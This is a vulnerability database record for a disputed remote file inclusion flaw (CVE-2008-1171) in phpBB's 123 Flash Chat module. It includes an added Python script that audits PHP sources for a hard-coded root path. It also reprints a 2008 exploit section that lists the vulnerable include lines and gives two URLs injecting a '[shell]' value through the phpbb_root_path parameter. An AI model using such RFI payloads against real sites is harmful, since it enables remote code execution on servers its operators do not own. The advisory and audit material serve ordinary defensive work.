phpBB 123 Flash Chat Multiple PHP Remote File Inclusion Vulnerabilities

Vulnerability ID: 1187491    Vulnerability type: Code injection
Published: 2008-03-05    Updated: 2008-09-05
CVE number: CVE-2008-1171    CNNVD-ID: CNNVD-200803-060
Platform: N/A    CVSS score: 6.8
|Vulnerability source
https://cxsecurity.com/issue/WLB-2008030009
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200803-060
|Vulnerability details
**Disputed** Multiple PHP remote file inclusion vulnerabilities in the 123 Flash Chat module for phpBB allow remote attackers to execute arbitrary PHP code via a URL in the phpbb_root_path parameter to (1) 123flashchat.php and (2) phpbb_login_chat.php. NOTE: CVE disputes this vulnerability because $phpbb_root_path is explicitly set to "./" in both programs.
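Because the dispute turns on whether $phpbb_root_path is hard-coded before the includes, the quickest check on an installed copy of 123flashchat.php or phpbb_login_chat.php is to look for a literal assignment preceding the first include that builds a path from it. The script below is an added example, not part of this record or of the module; the two PHP sources it scans are constructed stand-ins, not the real module files.

```python
import re

# Constructed PHP samples (not the real module sources): one hard-codes
# $phpbb_root_path before the includes, the other leaves it unset, which
# only matters when PHP's register_globals is on (removed in PHP 5.4).
HARDCODED_SRC = """<?php
$phpbb_root_path = './';
include($phpbb_root_path . 'extension.inc');
include($phpbb_root_path . 'common.'.$phpEx);
"""
UNSET_SRC = """<?php
include($phpbb_root_path . 'extension.inc');
include($phpbb_root_path . 'common.'.$phpEx);
"""

# A literal assignment such as:  $phpbb_root_path = './';
ASSIGN_RE = re.compile(r"\$phpbb_root_path\s*=\s*(['\"])(.*?)\1\s*;")
# The first include/require whose path is built from $phpbb_root_path
INCLUDE_RE = re.compile(r"\b(?:include|require)(?:_once)?\s*\(\s*\$phpbb_root_path\b")


def audit_root_path(src: str) -> dict:
    """Report whether $phpbb_root_path is fixed to a literal before the first
    include that uses it; that preceding assignment is what makes the RFI
    report for this module disputed."""
    inc = INCLUDE_RE.search(src)
    if inc is None:
        return {"uses_root_path": False, "fixed_before_include": None, "value": None}
    # Only assignments located before the include count
    assign = ASSIGN_RE.search(src, 0, inc.start())
    if assign is None:
        return {"uses_root_path": True, "fixed_before_include": False, "value": None}
    return {"uses_root_path": True, "fixed_before_include": True, "value": assign.group(2)}


def is_safe(src: str) -> bool:
    """True when the file never includes via $phpbb_root_path, or fixes it first."""
    r = audit_root_path(src)
    return (not r["uses_root_path"]) or bool(r["fixed_before_include"])


if __name__ == "__main__":
    for name, src in (("hard-coded", HARDCODED_SRC), ("unset", UNSET_SRC)):
        print(name, audit_root_path(src), "safe" if is_safe(src) else "review")
```

Run it against the real files by reading them into `src`; a file reported as "review" relies on register_globals being off and allow_url_include being off rather than on the code itself.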
|Exploit
#########################################################################################
# Script          : 123 Flash Chat Module for phpBB                                     #
# Discovered By   : F10                                                                 #
# Contact         : by_f10 (at) hotmail (dot) com [email concealed]                     #
# Site            : http://by-f10.com                                                   #
# Greetz          : by_emR3 , H0tturk , TaRanTuLa , gsy , ercu_145 ,                    #
#                   LupuS , m0sted , CyberGhost ... .                                   #
# From            : Turkey                                                              #
# Download        : http://php.arsivimiz.com/indir.php?ID=996&sIslem=Indir              #
#########################################################################################

The bugs are in :

path/123flashchat.php      include($phpbb_root_path . 'extension.inc');
path/123flashchat.php      include($phpbb_root_path . 'common.'.$phpEx);
path/phpbb_login_chat.php  include($phpbb_root_path . 'extension.inc');
path/phpbb_login_chat.php  include($phpbb_root_path . 'common.'.$phpEx);

exploitz :

www.site.com/path/123flashchat.php?phpbb_root_path=[shell]
www.site.com/path/phpbb_login_chat.php?phpbb_root_path=[shell]
|References

Source: BUGTRAQ
Name: 20080228 Re: 123 Flash Chat Module for phpBB
Link: http://www.securityfocus.com/archive/1/archive/1/488922/100/0/threaded
Source: BUGTRAQ
Name: 20080228 123 Flash Chat Module for phpBB
Link: http://www.securityfocus.com/archive/1/archive/1/488914/100/0/threaded
Source: VIM
Name: 20080305 false: 123 Flash Chat RFI
Link: http://www.attrition.org/pipermail/vim/2008-March/001913.html
Source: SREASON
Name: 3716
Link: http://securityreason.com/securityalert/3716